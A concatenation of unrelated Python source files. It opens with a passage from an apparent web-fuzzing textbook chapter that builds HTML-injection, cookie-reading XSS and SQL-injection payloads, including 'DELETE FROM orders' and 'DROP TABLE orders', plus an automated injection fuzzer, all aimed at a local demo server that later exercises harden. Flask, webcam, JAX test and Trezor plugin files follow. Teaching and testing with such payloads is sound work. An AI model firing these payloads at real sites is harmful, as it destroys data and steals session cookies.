value_symbol = new_symbol(grammar, "<" + field + "-value>")
grammar[field_symbol] = [field + "=" + value_symbol]
grammar[value_symbol] = field_type
grammar["<query>"] = [query]
# Remove unused parts
for nonterminal in unreachable_nonterminals(grammar):
del grammar[nonterminal]
assert is_valid_grammar(grammar)
return grammar
if __name__ == '__main__':
html_miner = HTMLGrammarMiner(html_text)
grammar = html_miner.mine_grammar()
grammar
if __name__ == '__main__':
grammar["<start>"]
if __name__ == '__main__':
grammar["<action>"]
if __name__ == '__main__':
grammar["<query>"]
if __name__ == '__main__':
grammar["<zip>"]
if __name__ == '__main__':
grammar["<terms>"]
if __name__ == '__main__':
order_fuzzer = GrammarFuzzer(grammar)
[order_fuzzer.fuzz() for i in range(3)]
if __name__ == '__main__':
HTML(webbrowser(urljoin(httpd_url, order_fuzzer.fuzz())))
### A Fuzzer for Web Forms
if __name__ == '__main__':
print('\n### A Fuzzer for Web Forms')
class WebFormFuzzer(GrammarFuzzer):
def __init__(self, url, **grammar_fuzzer_options):
html_text = self.get_html(url)
grammar = self.get_grammar(html_text)
super().__init__(grammar, **grammar_fuzzer_options)
def get_html(self, url):
return requests.get(url).text
def get_grammar(self, html_text):
grammar_miner = HTMLGrammarMiner(html_text)
return grammar_miner.mine_grammar()
if __name__ == '__main__':
web_form_fuzzer = WebFormFuzzer(httpd_url)
web_form_fuzzer.fuzz()
if __name__ == '__main__':
web_form_runner = WebRunner(httpd_url)
web_form_fuzzer.runs(web_form_runner, 10)
if __name__ == '__main__':
clear_httpd_messages()
## Crawling User Interfaces
## ------------------------
if __name__ == '__main__':
print('\n## Crawling User Interfaces')
class LinkHTMLParser(HTMLParser):
def reset(self):
super().reset()
self.links = []
def handle_starttag(self, tag, attrs):
attributes = {attr_name: attr_value for attr_name, attr_value in attrs}
if tag == "a" and "href" in attributes:
# print("Found:", tag, attributes)
self.links.append(attributes["href"])
from collections import deque
import urllib.robotparser
def crawl(url, max_pages=1, same_host=True):
"""Return the list of linked URLs from the given URL. Accesses up to `max_pages`."""
pages = deque([(url, "<param>")])
urls_seen = set()
rp = urllib.robotparser.RobotFileParser()
rp.set_url(urljoin(url, "/robots.txt"))
rp.read()
while len(pages) > 0 and max_pages > 0:
page, referrer = pages.popleft()
if not rp.can_fetch("*", page):
# Disallowed by robots.txt
continue
r = requests.get(page)
max_pages -= 1
if r.status_code != HTTPStatus.OK:
print("Error " + repr(r.status_code) + ": " + page,
"(referenced from " + referrer + ")",
file=sys.stderr)
continue
content_type = r.headers["content-type"]
if not content_type.startswith("text/html"):
continue
parser = LinkHTMLParser()
parser.feed(r.text)
for link in parser.links:
target_url = urljoin(page, link)
if same_host and urlsplit(
target_url).hostname != urlsplit(url).hostname:
# Different host
continue
if urlsplit(target_url).fragment != "":
# Ignore #fragments
continue
if target_url not in urls_seen:
pages.append((target_url, page))
urls_seen.add(target_url)
yield target_url
if page not in urls_seen:
urls_seen.add(page)
yield page
if __name__ == '__main__':
for url in crawl(httpd_url):
print_httpd_messages()
print_url(url)
if __name__ == '__main__':
for url in crawl("https://www.fuzzingbook.org/"):
print_url(url)
if __name__ == '__main__':
for url in crawl(httpd_url, max_pages=float('inf')):
web_form_fuzzer = WebFormFuzzer(url)
web_form_runner = WebRunner(url)
print(web_form_fuzzer.run(web_form_runner))
if __name__ == '__main__':
clear_httpd_messages()
## Crafting Web Attacks
## --------------------
if __name__ == '__main__':
print('\n## Crafting Web Attacks')
### HTML Injection Attacks
if __name__ == '__main__':
print('\n### HTML Injection Attacks')
from .Grammars import extend_grammar
ORDER_GRAMMAR_WITH_HTML_INJECTION = extend_grammar(ORDER_GRAMMAR, {
"<name>": [cgi_encode('''
Jane Doe<p>
<strong><a href="www.lots.of.malware">Click here for cute cat pictures!</a></strong>
</p>
''')],
})
if __name__ == '__main__':
html_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_HTML_INJECTION)
order_with_injected_html = html_injection_fuzzer.fuzz()
order_with_injected_html
if __name__ == '__main__':
HTML(webbrowser(urljoin(httpd_url, order_with_injected_html)))
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders WHERE name LIKE '%<%'").fetchall())
### Cross-Site Scripting Attacks
if __name__ == '__main__':
print('\n### Cross-Site Scripting Attacks')
ORDER_GRAMMAR_WITH_XSS_INJECTION = extend_grammar(ORDER_GRAMMAR, {
"<name>": [cgi_encode('Jane Doe' +
'<script>' +
'document.title = document.cookie.substring(0, 10);' +
'</script>')
],
})
if __name__ == '__main__':
xss_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_XSS_INJECTION)
order_with_injected_xss = xss_injection_fuzzer.fuzz()
order_with_injected_xss
if __name__ == '__main__':
url_with_injected_xss = urljoin(httpd_url, order_with_injected_xss)
url_with_injected_xss
if __name__ == '__main__':
HTML(webbrowser(url_with_injected_xss, mute=True))
if __name__ == '__main__':
HTML('<script>document.title = "Jupyter"</script>')
### SQL Injection Attacks
if __name__ == '__main__':
print('\n### SQL Injection Attacks')
if __name__ == '__main__':
values = {
"item": "tshirt",
"name": "Jane Doe",
"email": "j.doe@example.com",
"city": "Seattle",
"zip": "98104"
}
if __name__ == '__main__':
sql_command = ("INSERT INTO orders " +
"VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values))
sql_command
if __name__ == '__main__':
values["name"] = "Jane', 'x', 'x', 'x'); DELETE FROM orders; -- "
if __name__ == '__main__':
sql_command = ("INSERT INTO orders " +
"VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values))
sql_command
from .Grammars import extend_grammar
ORDER_GRAMMAR_WITH_SQL_INJECTION = extend_grammar(ORDER_GRAMMAR, {
"<name>": [cgi_encode("Jane', 'x', 'x', 'x'); DELETE FROM orders; --")],
})
if __name__ == '__main__':
sql_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_SQL_INJECTION)
order_with_injected_sql = sql_injection_fuzzer.fuzz()
order_with_injected_sql
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
if __name__ == '__main__':
contents = webbrowser(urljoin(httpd_url, order_with_injected_sql))
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
### Leaking Internal Information
if __name__ == '__main__':
print('\n### Leaking Internal Information')
if __name__ == '__main__':
answer = webbrowser(urljoin(httpd_url, "/order"), mute=True)
if __name__ == '__main__':
HTML(answer)
## Fully Automatic Web Attacks
## ---------------------------
if __name__ == '__main__':
print('\n## Fully Automatic Web Attacks')
class SQLInjectionGrammarMiner(HTMLGrammarMiner):
ATTACKS = [
"<string>' <sql-values>); <sql-payload>; <sql-comment>",
"<string>' <sql-comment>",
"' OR 1=1<sql-comment>'",
"<number> OR 1=1",
]
def __init__(self, html_text, sql_payload):
super().__init__(html_text)
self.QUERY_GRAMMAR = extend_grammar(self.QUERY_GRAMMAR, {
"<text>": ["<string>", "<sql-injection-attack>"],
"<number>": ["<digits>", "<sql-injection-attack>"],
"<checkbox>": ["<_checkbox>", "<sql-injection-attack>"],
"<email>": ["<_email>", "<sql-injection-attack>"],
"<sql-injection-attack>": [
cgi_encode(attack, "<->") for attack in self.ATTACKS
],
"<sql-values>": ["", cgi_encode("<sql-values>, '<string>'", "<->")],
"<sql-payload>": [cgi_encode(sql_payload)],
"<sql-comment>": ["--", "#"],
})
if __name__ == '__main__':
html_miner = SQLInjectionGrammarMiner(
html_text, sql_payload="DROP TABLE orders")
if __name__ == '__main__':
grammar = html_miner.mine_grammar()
grammar
if __name__ == '__main__':
grammar["<text>"]
if __name__ == '__main__':
sql_fuzzer = GrammarFuzzer(grammar)
sql_fuzzer.fuzz()
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
if __name__ == '__main__':
contents = webbrowser(urljoin(httpd_url,
"/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104"))
def orders_db_is_empty():
try:
entries = db.execute("SELECT * FROM orders").fetchall()
except sqlite3.OperationalError:
return True
return len(entries) == 0
if __name__ == '__main__':
orders_db_is_empty()
class SQLInjectionFuzzer(WebFormFuzzer):
def __init__(self, url, sql_payload="", **kwargs):
self.sql_payload = sql_payload
super().__init__(url, **kwargs)
def get_grammar(self, html_text):
grammar_miner = SQLInjectionGrammarMiner(
html_text, sql_payload=self.sql_payload)
return grammar_miner.mine_grammar()
if __name__ == '__main__':
sql_fuzzer = SQLInjectionFuzzer(httpd_url, "DELETE FROM orders")
web_runner = WebRunner(httpd_url)
trials = 1
while True:
sql_fuzzer.run(web_runner)
if orders_db_is_empty():
break
trials += 1
if __name__ == '__main__':
trials
if __name__ == '__main__':
orders_db_is_empty()
## Synopsis
## --------
if __name__ == '__main__':
print('\n## Synopsis')
### Fuzzing Web Forms
if __name__ == '__main__':
print('\n### Fuzzing Web Forms')
if __name__ == '__main__':
web_form_fuzzer = WebFormFuzzer(httpd_url)
if __name__ == '__main__':
web_form_fuzzer.grammar['<start>']
if __name__ == '__main__':
web_form_fuzzer.grammar['<action>']
if __name__ == '__main__':
web_form_fuzzer.grammar['<query>']
if __name__ == '__main__':
web_form_fuzzer.fuzz()
### SQL Injection Attacks
if __name__ == '__main__':
print('\n### SQL Injection Attacks')
if __name__ == '__main__':
sql_fuzzer = SQLInjectionFuzzer(httpd_url, "DELETE FROM orders")
sql_fuzzer.fuzz()
## Lessons Learned
## ---------------
if __name__ == '__main__':
print('\n## Lessons Learned')
if __name__ == '__main__':
clear_httpd_messages()
if __name__ == '__main__':
httpd_process.terminate()
## Next Steps
## ----------
if __name__ == '__main__':
print('\n## Next Steps')
## Background
## ----------
if __name__ == '__main__':
print('\n## Background')
## Exercises
## ---------
if __name__ == '__main__':
print('\n## Exercises')
### Exercise 1: Fix the Server
if __name__ == '__main__':
print('\n### Exercise 1: Fix the Server')
#### Part 1: Silent Failures
if __name__ == '__main__':
print('\n#### Part 1: Silent Failures')
BETTER_HTML_INTERNAL_SERVER_ERROR = \
HTML_INTERNAL_SERVER_ERROR.replace("<pre>{error_message}</pre>", "")
if __name__ == '__main__':
HTML(BETTER_HTML_INTERNAL_SERVER_ERROR)
class BetterHTTPRequestHandler(SimpleHTTPRequestHandler):
def internal_server_error(self):
# Note: No INTERNAL_SERVER_ERROR status
self.send_response(HTTPStatus.OK, "Internal Error")
self.send_header("Content-type", "text/html")
self.end_headers()
exc = traceback.format_exc()
self.log_message("%s", exc.strip())
# No traceback or other information
message = BETTER_HTML_INTERNAL_SERVER_ERROR
self.wfile.write(message.encode("utf8"))
#### Part 2: Sanitized HTML
if __name__ == '__main__':
print('\n#### Part 2: Sanitized HTML')
import html
class BetterHTTPRequestHandler(BetterHTTPRequestHandler):
def send_order_received(self, values):
sanitized_values = {}
for field in values:
sanitized_values[field] = html.escape(values[field])
sanitized_values["item_name"] = html.escape(
FUZZINGBOOK_SWAG[values["item"]])
confirmation = HTML_ORDER_RECEIVED.format(
**sanitized_values).encode("utf8")
self.send_response(HTTPStatus.OK, "Order received")
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(confirmation)
#### Part 3: Sanitized SQL
if __name__ == '__main__':
print('\n#### Part 3: Sanitized SQL')
class BetterHTTPRequestHandler(BetterHTTPRequestHandler):
def store_order(self, values):
db = sqlite3.connect(ORDERS_DB)
db.execute("INSERT INTO orders VALUES (?, ?, ?, ?, ?)",
(values['item'], values['name'], values['email'], values['city'], values['zip']))
db.commit()
#### Part 4: A Robust Server
if __name__ == '__main__':
print('\n#### Part 4: A Robust Server')
class BetterHTTPRequestHandler(BetterHTTPRequestHandler):
REQUIRED_FIELDS = ['item', 'name', 'email', 'city', 'zip']
def handle_order(self):
values = self.get_field_values()
for required_field in self.REQUIRED_FIELDS:
if required_field not in values:
self.send_order_form()
return
self.store_order(values)
self.send_order_received(values)
#### Part 5: Test it!
if __name__ == '__main__':
print('\n#### Part 5: Test it!')
if __name__ == '__main__':
httpd_process, httpd_url = start_httpd(BetterHTTPRequestHandler)
if __name__ == '__main__':
print_url(httpd_url)
if __name__ == '__main__':
print_httpd_messages()
if __name__ == '__main__':
standard_order = "/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104"
contents = webbrowser(httpd_url + standard_order)
HTML(contents)
if __name__ == '__main__':
assert contents.find("Thank you") > 0
if __name__ == '__main__':
bad_order = "/order?item="
contents = webbrowser(httpd_url + bad_order)
HTML(contents)
if __name__ == '__main__':
assert contents.find("Order Form") > 0
if __name__ == '__main__':
injection_order = "/order?item=tshirt&name=Jane+Doe" + cgi_encode("<script></script>") + \
"&email=doe%40example.com&city=Seattle&zip=98104"
contents = webbrowser(httpd_url + injection_order)
HTML(contents)
if __name__ == '__main__':
assert contents.find("Thank you") > 0
assert contents.find("<script>") < 0  # the raw tag must not appear
assert contents.find("&lt;script&gt;") > 0  # the escaped form should appear instead
if __name__ == '__main__':
sql_order = "/order?item=tshirt&name=" + \
cgi_encode("Robert', 'x', 'x', 'x'); DELETE FROM orders; --") + \
"&email=doe%40example.com&city=Seattle&zip=98104"
contents = webbrowser(httpd_url + sql_order)
HTML(contents)
if __name__ == '__main__':
assert contents.find("DELETE FROM") > 0
assert not orders_db_is_empty()
if __name__ == '__main__':
httpd_process.terminate()
if __name__ == '__main__':
if os.path.exists(ORDERS_DB):
os.remove(ORDERS_DB)
### Exercise 2: Protect the Server
if __name__ == '__main__':
print('\n### Exercise 2: Protect the Server')
#### Part 1: A Blacklisting Filter
if __name__ == '__main__':
print('\n#### Part 1: A Blacklisting Filter')
#### Part 2: A Whitelisting Filter
if __name__ == '__main__':
print('\n#### Part 2: A Whitelisting Filter')
### Exercise 3: Input Patterns
if __name__ == '__main__':
print('\n### Exercise 3: Input Patterns')
### Exercise 4: Coverage-Driven Web Fuzzing
if __name__ == '__main__':
print('\n### Exercise 4: Coverage-Driven Web Fuzzing')
|
Cgi.py
|
import logging
from os import getcwd
from flask import request, render_template, jsonify, redirect, url_for
from flask_socketio import emit
class CgiSocket(object):
def __init__(self):
self.events = {}
self.args = {'emitter':None,'namespace':'default'}
self.namespace = 'default'
self.emitter = None
def decorate(self,arguments):
from Process import decorate
return decorate(self,arguments)
def create(self,socket):
self.emitter = self.args.get('emitter')
if None == self.emitter:
logging.error('no event dispatcher set')
return self
self.external = socket
self.namespace = self.args.get('namespace')
self.external.on('connect',namespace='/%s'%self.namespace)(self.connect) # == @socketio.on('connect',namespace='/namespace')
self.external.on('request',namespace='/%s'%self.namespace)(self.request) # == @socketio.on('request',namespace='/namespace')
self.external.on('disconnect',namespace='/%s'%self.namespace)(self.disconnect) # == @socketio.on('disconnect',namespace='/namespace')
self.external.on('error',namespace='/%s'%self.namespace)(self.error) # == @socketio.on_error('/namespace')
logging.info('%s socket created'%self.namespace)
return self
def connect(self):
logging.info('connect-%s'%self.namespace)
self.external.emit('connected', {'call':'%s-connected'%self.namespace,'id':'connect-%s'%self.namespace},namespace='/%s'%self.namespace)
def request(self,data):
logging.debug('request-%s'%self.namespace)
data['call'] = data.get('request')
data['host'] = request.host # print dir(request)
data['sid'] = request.sid
self.emitter.emit(data.get('call'),data)
# self.external.emit('response', {'call':'%s-request'%self.namespace,'id':'response-%s'%self.namespace,'origin':data},namespace='/%s'%self.namespace)
def disconnect(self):
logging.info('%s disconnected from %s'%(request.host,self.namespace))
def error(self,error):
logging.error('%s socket error %s'%(self.namespace,str(error)))
class CgiErrors(object):
def __init__(self):
self.args = {'path':'errors','errors':[]}
# unsupported 101,102,103,200,201,202,203,204,205,206,207,208,226,300,301,302,303,304,305,306,307,308,402,407,418,421,422,423,424,426,506,507,508,510,511
self.errors = [400,401,403,404,405,406,408,409,410,411,412,413,414,415,416,417,428,429,431,451,500,501,502,503,504,505]
def decorate(self,arguments):
keys = self.args.keys()
for key in arguments:
if key in keys:
self.args[key] = arguments[key]
return self
def create(self,cgi):
custom = self.args.get('errors')
for code in custom:
cgi.register_error_handler(int(code),self.handler)
for code in self.errors:
if not code in custom:
cgi.register_error_handler(int(code),self.default)
def default(self,error):
if hasattr(error, 'errno'): # protected route redirect error.name = template path
return render_template('%s'%error.name)
else:
return render_template('%s/default.html'%self.args.get('path'),code=error.code,name=error.name,description=error.description,message=error.message,args=error.args,response=error.response),error.code
def handler(self,error):
if hasattr(error, 'errno'): # protected route redirect error.name = template path
return render_template('%s'%error.name)
elif hasattr(error, 'code'): # flask
return render_template('%s/%s.html'%(self.args.get('path'),error.code)),error.code
# return render_template('%s/%s.html'%(self.args.get('path'),error.code),code=error.code,name=error.name,description=error.description,message=error.message,args=error.args,response=error.response),error.code
else:
return render_template('%s/500.html'%self.args.get('path')),500
class CgiRoutes(object):
def __init__(self):
self.events = {}
self.args = {'index':'h0rn3.html','path':'pages','watchdog':'custom'}
# do routes from cfg
# [routes]
# index = {'f':'index','method':['GET'],secure:False}
# 70g1n = {'f':'login','method':['GET'],secure:False}
# 4Dm1n = {'f':'admin','method':['GET'],secure:True}
# d21v3 = {'f':'drive','method':['GET'],secure:True}
self.routes = {'/':self.index ,'/h0rn3':self.index ,'/70g1n':self.login ,'/4Dm1n':self.admin ,'/d21v3':self.drive}
self.method = {'/':['GET'] ,'/h0rn3':['GET'] ,'/70g1n':['GET'] ,'/4Dm1n':['GET'] ,'/d21v3':['GET']}
self.secure = {'/':False ,'/h0rn3':False ,'/70g1n':False ,'/4Dm1n':True ,'/d21v3':False}
self.index = None
self.watchdogs = CgiWatchdogs().watchdogs
def decorate(self,arguments):
from Process import decorate
return decorate(self,arguments)
def create(self,cgi):
watchdog = self.watchdogs.get('custom')
dogname = self.args.get('watchdog')
if dogname in self.watchdogs.keys():
watchdog = self.watchdogs.get(dogname)
else:
logging.warning('%s watchdog unknown. use default protection. route integrity doubtful.'%dogname)
for key in self.routes.keys():
if self.secure.get(key):
cgi.add_url_rule(key,view_func=watchdog(self.routes.get(key)))
else:
cgi.add_url_rule(key,view_func=self.routes.get(key),methods=self.method.get(key)) # methods=self.method.get(key), default: only GET
# cgi.before_request(f) # called before each request
# cgi.after_request(f) # called after each request
self.index = '%s/%s'%(self.args.get('path'),self.args.get('index'))
# no common handler possible, override error !
# request object parameter
# request.path /page
# request.script_root /myapplication
# request.base_url http://www.example.com/myapplication/page.html
# request.url http://www.example.com/myapplication/page.html?x=y
# request.url_root http://www.example.com/myapplication/
# request.method GET
# request.args {}
def index(self):
return render_template(self.index,title='muK.1nd3x'),200
def login(self):
return render_template('%s/70g1n.html'%self.args.get('path'),title='muK.70g1n'),200
def admin(self):
return render_template('%s/4Dm1n.html'%self.args.get('path'),title='muK.4Dm1n'),200
def drive(self):
return render_template('%s/d21v3.html'%self.args.get('path'),title='muK.d21v3'),200
class CgiWatchdogs(object):
def __init__(self):
self.events = {'got-user':self.decorate,'got-token':self.decorate}
self.args = {'user':None,'token':None}
self.watchdogs = {'custom':self.custom,'firebase':self.firebase}
def decorate(self,arguments):
from Process import decorate
return decorate(self,arguments)
def custom(self,f):
from functools import wraps
@wraps(f)
def decorated_function(*args, **kwargs):
if None == self.args.get('user'):
return redirect(url_for('login', next=request.url))
return f(*args, **kwargs)
return decorated_function
def firebase(self,f):
from functools import wraps
@wraps(f)
def decorated_function(*args, **kwargs):
if None == self.args.get('token'):
return redirect(url_for('login', next=request.url))
return f(*args, **kwargs)
return decorated_function
class Cgi(object):
def __init__(self,folder='%s/static'%getcwd()):
self.events = {'push-sio':self.push,'create-cgi':self.create,'cgi-options':self.decorate}
self.args = {'emitter':None,'host':'0.0.0.0','port':5000,'logger':None,'debug':False,'deamon':True
,'key':'ssl/host.key','crt':'ssl/host.crt','env':'production'}
from flask import Flask
self.cgi = Flask(__name__,template_folder=folder,static_folder=folder)
from flask_socketio import SocketIO
# async_mode eventlet|gevent|threading
self.socket = SocketIO(self.cgi,async_mode='threading',debug=self.args.get('debug')) # eventlet is best performance, but threading works
self.socket.on_error_default(self.error) # == @socketio.on_error_default | socketio.on_error(None)(handler)
from flask_login import LoginManager
self.login = LoginManager(self.cgi)
self.login.login_view = 'login' # == url_for(login) # name of the function
from glob import glob
path = '%s/static/errors/'%getcwd()
pages = glob('%s[1-5][0-9][0-9].html'%path)
for i, page in enumerate(pages):
pages[i] = int(page.replace(path,'').replace('.html',''))
CgiErrors().decorate({'errors':pages}).create(self.cgi)
CgiRoutes().decorate({'watchdog':'firebase'}).create(self.cgi)
def decorate(self,arguments):
from Process import decorate
return decorate(self,arguments)
def create(self,data={}):
self.cgi.config['HOST'] = self.args.get('host')
self.cgi.config['PORT'] = self.args.get('port')
self.cgi.config['DEBUG'] = self.args.get('debug')
self.cgi.config['ENV'] = self.args.get('env') # production|development
if not None == self.args.get('logger'):
# self.cgi.logger = self.args.get('logger') # error can't set attribute
if(0 < len(self.cgi.logger.handlers)):
self.cgi.logger.handlers.pop()
self.cgi.logger.addHandler(self.args.get('logger'))
from threading import Thread
self.thread = Thread(target=self.start)
self.thread.setDaemon(self.args.get('deamon'))
self.thread.start()
return self
def start(self):
self.cgi.run(host=self.args.get('host'),ssl_context=(self.args.get('crt'),self.args.get('key')))
return self
def error(self,error):
logging.error('default socket error %s'%str(error))
def push(self,data):
namespace = data.get('namespace')
self.socket.emit('response',{'call':'%s-got'%namespace,'id':'push-%s'%namespace,'data':data},namespace='/%s'%namespace)
|
consumer.py
|
#!/bin/env python
#===============================================================================
# NAME: consumer.py
#
# DESCRIPTION: This module defines the Consumer class. The class contains a
# thread which blocks on a queue for messages, executes
# context-specific data processing, and notifies observers
# with the processed data.
#
# AUTHOR: Brian Campuzano
# DATE CREATED: July 10, 2017
#
# Copyright 2017, California Institute of Technology.
# ALL RIGHTS RESERVED. U.S. Government Sponsorship acknowledged.
#===============================================================================
import Queue
import threading
from controllers import observer
# Make class an abstract base class
class Consumer(observer.Observable):
'''
Thread class that services a queue
'''
def __init__(self):
super(Consumer, self).__init__()
# Create Queue for events here
self._queue = Queue.Queue()
# Run flag
self.__run = False
# Store thread handle
self.__thread = threading.Thread()
def put_data(self, data):
self._queue.put(data)
def start_thread(self):
# Set run flag
self.__run = True
# create background event thread
self.__thread = threading.Thread(target=self.service_queue, args=[self._queue])
# start event thread here
self.__thread.start()
def stop_thread(self):
# Stop thread and wait for exit
self.__run = False
def process_data(self, data):
'''
Override function for data specific processing
'''
pass
def service_queue(self, queue):
'''
Queue up socket events for observer processing
'''
while self.__run:
try:
# Block on queue for 1 second in order to check exit condition
data = queue.get(True, 1)
except Queue.Empty:
continue
else:
self.process_data(data)
self.notifyObservers(data)
if __name__ == '__main__':
pass
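# A minimal usage sketch (the PrintConsumer subclass below is hypothetical and
# shown only for illustration; it is not part of this module):
#
#   class PrintConsumer(Consumer):
#       def process_data(self, data):
#           print "processing %s" % str(data)
#
#   consumer = PrintConsumer()
#   consumer.start_thread()     # background thread starts servicing the queue
#   consumer.put_data("hello")  # processed, then observers are notified
#   consumer.stop_thread()      # thread exits within ~1 second (queue timeout)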
|
main.py
|
import process
import server
import argparse
import cv2
import numpy as np
import pyfakewebcam # generating fake webcam on top of v4l2loopback-utils
import os
from multiprocessing import Process, Queue
def blur_frame(img, net, settings):
faces = process.find_faces_yolo(img, net)
# faces = process.find_faces_haar(img, args.classifier)
blurred_img = process.blur_faces(img, faces,
max_area=settings['max_face_size'],
blur_value=max(int(settings['blur_value']), 0),
blur_size=settings['blur_size'])
return blurred_img
def main(args, net, queue, debug=False):
if args.img is not None:
# If img is specified run on image
img = cv2.imread(args.img)
blurred_img = blur_frame(img, net, server.settings)
# show image
if args.out:
cv2.imwrite(args.out, blurred_img)
else:
out = np.hstack((img, blurred_img))
cv2.imshow('out', out)
cv2.waitKey()
else:
# run on video by default
cap = cv2.VideoCapture(args.cam)
height, width = 720, 1280
cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
cap.set(cv2.CAP_PROP_FPS, 60)
try:
fake = pyfakewebcam.FakeWebcam('/dev/video20', width, height) # setup fake
except FileNotFoundError:
# Need to initialize
os.system('./setup.sh')
fake = pyfakewebcam.FakeWebcam('/dev/video20', width, height) # setup fake
while True:
if queue.full():
server.settings = queue.get()
ret, img = cap.read()
blurred_img = blur_frame(img, net, server.settings)
blurred_img_rgb = cv2.cvtColor(blurred_img, cv2.COLOR_BGR2RGB) # switch BGR2RGB
fake.schedule_frame(blurred_img_rgb)
if debug:
out = np.hstack((img, blurred_img))
cv2.imshow('out', out)
if cv2.waitKey(1) & 0xff == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Blur out faces')
parser.add_argument('--img', type=str, help='File to blur')
parser.add_argument('--cam', type=int, help='Camera capture', default=0)
parser.add_argument('--classifier', type=str, help='Classifier xml file',
default='./cascades/haarcascade_frontalface_default.xml')
parser.add_argument('--out', type=str, help='Output file')
parser.add_argument('--cfg', type=str, help='cfg file',
default='./cfg/face-yolov3-tiny.cfg')
parser.add_argument('--weights', type=str, help='weights file',
default='./model-weights/face-yolov3-tiny_41000.weights')
parser.add_argument('--debug', help='Enable debug mode', action='store_true')
args = parser.parse_args()
net = process.generate_yolo_net(args.cfg, args.weights)
settings_queue = Queue(1)
server_process = Process(target=server.start_server, args=(settings_queue, ))
server_process.start()
main_process = Process(target=main, args=(args, net, settings_queue, args.debug))
main_process.start()
main_process.join()
|
infeed_test.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
from absl.testing import absltest
import jax
from jax import lax, numpy as np
from jax.config import config
from jax.experimental import host_callback as hcb
from jax.lib import xla_client
import jax.test_util as jtu
import numpy as onp
config.parse_flags_with_absl()
FLAGS = config.FLAGS
class InfeedTest(jtu.JaxTestCase):
def testInfeed(self):
@jax.jit
def f(x):
token = lax.create_token(x)
(y,), token = lax.infeed(
token, shape=(jax.ShapedArray((3, 4), np.float32),))
(z,), _ = lax.infeed(
token, shape=(jax.ShapedArray((3, 1, 1), np.float32),))
return x + y + z
x = onp.float32(1.5)
y = onp.reshape(onp.arange(12, dtype=onp.float32), (3, 4)) # onp.random.randn(3, 4).astype(onp.float32)
z = onp.random.randn(3, 1, 1).astype(onp.float32)
device = jax.local_devices()[0]
device.transfer_to_infeed((y,))
device.transfer_to_infeed((z,))
self.assertAllClose(f(x), x + y + z)
def testInfeedThenOutfeed(self):
hcb.stop_outfeed_receiver()
@jax.jit
def f(x):
token = lax.create_token(x)
y, token = lax.infeed(
token, shape=jax.ShapedArray((3, 4), np.float32))
token = lax.outfeed(token, y + onp.float32(1))
return lax.tie_in(token, x - 1)
x = onp.float32(7.5)
y = onp.random.randn(3, 4).astype(onp.float32)
execution = threading.Thread(target=lambda: f(x))
execution.start()
device = jax.local_devices()[0]
device.transfer_to_infeed((y,))
out, = device.transfer_from_outfeed(
xla_client.shape_from_pyval((y,)).with_major_to_minor_layout_if_absent())
execution.join()
self.assertAllClose(out, y + onp.float32(1))
def testInfeedThenOutfeedInALoop(self):
hcb.stop_outfeed_receiver()
def doubler(_, token):
y, token = lax.infeed(
token, shape=jax.ShapedArray((3, 4), np.float32))
return lax.outfeed(token, y * onp.float32(2))
@jax.jit
def f(n):
token = lax.create_token(n)
token = lax.fori_loop(0, n, doubler, token)
return lax.tie_in(token, n)
device = jax.local_devices()[0]
n = 10
execution = threading.Thread(target=lambda: f(n))
execution.start()
for _ in range(n):
x = onp.random.randn(3, 4).astype(onp.float32)
device.transfer_to_infeed((x,))
y, = device.transfer_from_outfeed(xla_client.shape_from_pyval((x,))
.with_major_to_minor_layout_if_absent())
self.assertAllClose(y, x * onp.float32(2))
execution.join()
if __name__ == '__main__':
absltest.main(testLoader=jtu.JaxTestLoader())
|
trezor.py
|
import traceback
import sys
from typing import NamedTuple, Any
from zephyr_code.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from zephyr_code.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from zephyr_code.bip32 import BIP32Node, convert_bip32_path_to_list_of_uint32 as parse_path
from zephyr_code import constants
from zephyr_code.i18n import _
from zephyr_code.plugin import Device
from zephyr_code.transaction import deserialize, Transaction
from zephyr_code.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from zephyr_code.base_wizard import ScriptTypeNotSupported, HWD_SETUP_NEW_WALLET
from zephyr_code.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
LibraryFoundButUnusable)
_logger = get_logger(__name__)
try:
import trezorlib
import trezorlib.transport
from .clientbase import TrezorClientBase
from trezorlib.messages import (
RecoveryDeviceType, HDNodeType, HDNodePathType,
InputScriptType, OutputScriptType, MultisigRedeemScriptType,
TxInputType, TxOutputType, TxOutputBinType, TransactionType, SignTx)
RECOVERY_TYPE_SCRAMBLED_WORDS = RecoveryDeviceType.ScrambledWords
RECOVERY_TYPE_MATRIX = RecoveryDeviceType.Matrix
TREZORLIB = True
except Exception as e:
_logger.exception('error importing trezorlib')
TREZORLIB = False
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(2)
# Trezor initialization methods
TIM_NEW, TIM_RECOVER = range(2)
TREZOR_PRODUCT_KEY = 'Trezor'
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = TREZOR_PRODUCT_KEY
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
